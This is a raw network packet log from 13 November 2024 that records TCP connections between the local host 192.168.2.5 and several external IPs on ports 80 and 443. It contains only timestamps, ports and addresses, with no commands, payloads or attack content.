Nov 13, 2024 20:39:48.396184921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396197081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396203041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.396218061 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.396245003 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.396476984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396570921 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.397064924 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.397082090 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.398319006 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.398323059 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.439692020 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.439755917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.439806938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.439806938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.439917088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.440010071 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.440434933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.440500021 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.454863071 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.465472937 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.465516090 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.466181993 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.466190100 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.466619015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466630936 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466715097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.466842890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466861963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466881037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466886997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.466900110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466901064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.466917038 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.466922045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.466929913 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.467046022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.467138052 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.467155933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.467190027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.467221975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.467344999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.467371941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.467411995 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.470206022 CET	49934	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.470242023 CET	443	49934	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:48.470451117 CET	49934	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.470863104 CET	49935	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.470906019 CET	443	49935	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:48.471014023 CET	49935	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.471560955 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.471596956 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:48.471772909 CET	49934	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.471782923 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.471787930 CET	443	49934	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:48.472034931 CET	49935	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.472052097 CET	443	49935	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:48.472187996 CET	49936	443	192.168.2.5	23.47.51.183
Nov 13, 2024 20:39:48.472204924 CET	443	49936	23.47.51.183	192.168.2.5
Nov 13, 2024 20:39:48.478810072 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.479342937 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.479372025 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.479983091 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.479990005 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.485569000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485608101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485622883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485637903 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.485657930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485670090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485678911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.485682964 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485697031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.485699892 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.485726118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.485748053 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.486135006 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.486148119 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.486159086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.486166954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.486179113 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.486196041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.496613979 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496635914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496648073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496686935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.496710062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.496841908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496891975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496900082 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.496903896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496932030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.496938944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496952057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.496990919 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.512252092 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.512280941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.512294054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.512311935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.512337923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.512337923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.512993097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.513050079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.513052940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.513083935 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.527184010 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.527257919 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.527553082 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.527703047 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.527721882 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.527733088 CET	49919	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.527739048 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.535826921 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.535876989 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.535943985 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.536236048 CET	49937	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.536252022 CET	443	49937	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.562604904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.568176985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.575861931 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.576126099 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.576148033 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.577022076 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.577079058 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.577876091 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.577938080 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.588689089 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.589627028 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.589648008 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.590115070 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.590121984 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.591918945 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.592127085 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.592184067 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.592214108 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.592230082 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.592242002 CET	49922	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.592247009 CET	443	49922	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.596467972 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.596512079 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.596576929 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.596795082 CET	49938	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.596818924 CET	443	49938	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.608136892 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.608396053 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.608424902 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.609848022 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.609899044 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.610129118 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.610214949 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.610285044 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.610328913 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.610799074 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.610819101 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.610831976 CET	49923	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.610838890 CET	443	49923	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.610975981 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.611059904 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.613537073 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.613574028 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.613823891 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.613910913 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.613928080 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.625236034 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.625250101 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.653528929 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.653549910 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.668791056 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.699754000 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.719487906 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.719636917 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.719834089 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.720057011 CET	49918	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.720062971 CET	443	49918	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.725353956 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.725374937 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.725569010 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.725785971 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:48.725800037 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.844172001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844214916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844224930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.844261885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.844275951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844345093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.844367981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844386101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844398975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844404936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.844410896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844424009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844434023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.844438076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.844460011 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.844472885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845179081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845217943 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845218897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845252991 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845308065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845351934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845385075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845398903 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845546961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845592976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845592976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845606089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845618010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.845626116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.845650911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.846015930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.846057892 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.846069098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.846072912 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.846082926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.846092939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.846096992 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.846122026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.885991096 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.886225939 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.886250973 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.887922049 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.887984991 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.888289928 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.888562918 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.888650894 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.888730049 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.888748884 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.888853073 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.888859987 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.889415026 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.889843941 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.889929056 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.890464067 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.896090031 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.896281958 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.896310091 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.898359060 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.898415089 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.898732901 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.898833990 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.898838043 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.898937941 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.899091005 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.899097919 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.900552988 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.900609970 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.900913954 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.900973082 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.901004076 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.901029110 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.901232004 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.901242971 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.902652025 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.902735949 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.903578043 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.903685093 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.903702974 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.904696941 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.904891014 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.904900074 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.905334949 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.905597925 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.905658007 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.905697107 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.931323051 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.934093952 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.939331055 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.943325996 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.947323084 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.947334051 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.949636936 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.949645042 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.949661970 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.949661970 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.949665070 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.949677944 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.949692011 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.996201992 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.996220112 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.996241093 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.001257896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001281977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001291990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001343012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001343012 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.001354933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001365900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001393080 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.001416922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.001588106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001605988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001616001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001646042 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.001684904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.001830101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001840115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001857996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001868010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001876116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.001879930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.001893044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002197981 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002311945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002321959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002331972 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002341032 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002355099 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002370119 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002557993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002568960 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002588034 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002607107 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002607107 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002619028 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002630949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002639055 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002644062 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.002650023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002665997 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.002684116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.003192902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003205061 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003215075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003232002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003242016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003246069 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.003253937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003269911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003273010 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.003283024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003293991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.003298044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.003309965 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.003331900 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.004127026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.006179094 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.019043922 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.019098043 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.019151926 CET	49931	443	192.168.2.5	13.107.246.57
